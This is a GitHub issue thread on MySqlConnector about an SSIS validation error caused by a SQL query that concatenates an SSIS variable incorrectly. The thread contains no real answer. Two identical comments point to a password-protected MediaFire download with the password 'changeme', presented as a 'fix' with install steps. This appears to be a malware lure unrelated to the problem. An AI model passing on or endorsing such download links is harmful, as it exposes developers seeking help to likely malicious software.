### ISSUE TITLE
TITLE: Package Validation Error: SSIS package Error

### ISSUE THREAD

**Issue by RachaelTsaurai** [mysql-net/MySqlConnector#1509]
------------------------------

Package Validation Error

------------------------------
ADDITIONAL INFORMATION:

Error at Data Flow Task [source customers [2]]: An error occurred executing the provided SQL command: "SELECT `customers`.`CustomerID`,
    `customers`.`CustomerName`,
    `customers`.`ContactName`,
    `customers`.`Address`,
    `customers`.`City`,
    `customers`.`PostalCode`,
    `customers`.`Country`
FROM `northwind`.`customers` where CustomerID> + @[User::varMaxCustID]". You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[User::varMaxCustID]' at line 8

Error at Data Flow Task [SSIS.Pipeline]: "source customers" failed validation and returned validation status "VS_ISBROKEN".

Error at Data Flow Task [SSIS.Pipeline]: One or more component failed validation.

Error at Data Flow Task: There were errors during task validation.

 (Microsoft.DataTransformationServices.VsIntegration)

------------------------------
BUTTONS:

OK
------------------------------

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
